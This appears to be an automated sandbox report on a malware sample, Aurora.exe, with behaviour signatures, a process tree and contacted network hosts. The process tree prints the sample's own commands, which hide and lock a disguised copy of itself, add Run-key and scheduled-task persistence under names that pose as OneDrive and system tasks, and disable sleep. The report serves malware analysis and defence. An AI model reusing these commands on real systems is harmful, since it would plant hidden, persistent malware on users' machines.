Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4000 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe
PID 4000 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe
PID 5000 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe C:\Windows\system32\cmd.exe
PID 5000 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe C:\Windows\system32\cmd.exe
PID 4000 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe
PID 4000 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe
PID 4000 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe
PID 1844 wrote to memory of 3960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1844 wrote to memory of 3960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4000 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe
PID 4000 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe
PID 4000 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe
PID 4000 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe
PID 4000 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe
PID 3960 wrote to memory of 4868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\PING.EXE
PID 3960 wrote to memory of 4868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\PING.EXE
PID 2680 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\SysWOW64\cmd.exe
PID 2680 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\SysWOW64\cmd.exe
PID 2680 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\SysWOW64\cmd.exe
PID 2680 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2680 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2680 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2680 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2680 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2680 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2680 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2680 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2680 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2680 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2680 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2680 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2680 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2680 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2220 wrote to memory of 5100 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2220 wrote to memory of 5100 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2220 wrote to memory of 5100 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3960 wrote to memory of 1064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3960 wrote to memory of 1064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3960 wrote to memory of 1580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 3960 wrote to memory of 1580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 3960 wrote to memory of 1036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3960 wrote to memory of 1036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1036 wrote to memory of 4536 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Msedge.exe
PID 1036 wrote to memory of 4536 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Msedge.exe
PID 3980 wrote to memory of 3152 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3980 wrote to memory of 3152 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3980 wrote to memory of 4628 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3980 wrote to memory of 4628 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3980 wrote to memory of 4392 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3980 wrote to memory of 4392 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3980 wrote to memory of 640 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3980 wrote to memory of 640 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4868 wrote to memory of 3496 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4868 wrote to memory of 3496 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4868 wrote to memory of 3608 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4868 wrote to memory of 3608 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4868 wrote to memory of 4896 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4868 wrote to memory of 4896 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4868 wrote to memory of 2244 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4868 wrote to memory of 2244 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 724 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe C:\Windows\System32\conhost.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Aurora.exe

"C:\Users\Admin\AppData\Local\Temp\Aurora.exe"

C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe

"C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd /Q /C " ping localhost -n 1 && copy "C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" "C:\Users\Admin\AppData\Local\Msedge.exe" && attrib +r +h +a "C:\Users\Admin\AppData\Local\Msedge.exe" && icacls "C:\Users\Admin\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA) && del "C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" && cmd /C "start "C:\Users\Admin\AppData\Local\Msedge.exe" && exit" && && exit "

C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe

"C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe"

C:\Windows\system32\cmd.exe

cmd /Q /C " ping localhost -n 1 && copy "C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" "C:\Users\Admin\AppData\Local\Msedge.exe" && attrib +r +h +a "C:\Users\Admin\AppData\Local\Msedge.exe" && icacls "C:\Users\Admin\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA) && del "C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" && cmd /C "start "C:\Users\Admin\AppData\Local\Msedge.exe"

C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe"

C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe

"C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe"

C:\Windows\system32\PING.EXE

ping localhost -n 1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate' -Value '"C:\Users\Admin\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\cmd.exe

"cmd" /C schtasks /create /tn \OneDriveUpdate /tr "C:\Users\Admin\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

#cmd

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn \OneDriveUpdate /tr "C:\Users\Admin\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

C:\Windows\system32\attrib.exe

attrib +r +h +a "C:\Users\Admin\AppData\Local\Msedge.exe"

C:\Windows\system32\icacls.exe

icacls "C:\Users\Admin\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA)

C:\Windows\system32\cmd.exe

cmd /C "start "C:\Users\Admin\AppData\Local\Msedge.exe

C:\Users\Admin\AppData\Local\Msedge.exe

C:\Users\Admin\AppData\Local\Msedge.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#npnsokoe#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'ConsoleWindowsHost' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ConsoleWindowsHost' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "ConsoleWindowsHost"

C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe

C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#npnsokoe#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'ConsoleWindowsHost' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ConsoleWindowsHost' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe

Network

Country  Destination             Domain                         Proto
US       8.8.8.8:53              58.55.71.13.in-addr.arpa       udp
US       8.8.8.8:53              25.140.123.92.in-addr.arpa     udp
US       8.8.8.8:53              2.159.190.20.in-addr.arpa      udp
GB       154.81.220.233:28105                                   tcp
US       8.8.8.8:53              88.156.103.20.in-addr.arpa     udp
US       8.8.8.8:53              auroraforge.art                udp
US       192.64.119.108:55326    auroraforge.art                tcp
GB       154.81.220.233:28105                                   tcp
US       8.8.8.8:53              149.220.183.52.in-addr.arpa    udp
GB       154.81.220.233:28105                                   tcp
US       8.8.8.8:53              50.23.12.20.in-addr.arpa       udp
US       8.8.8.8:53              171.39.242.20.in-addr.arpa     udp
GB       154.81.220.233:28105                                   tcp
US       8.8.8.8:53              thesirenmika.com               udp
CN       123.123.123.123:55713   thesirenmika.com               tcp
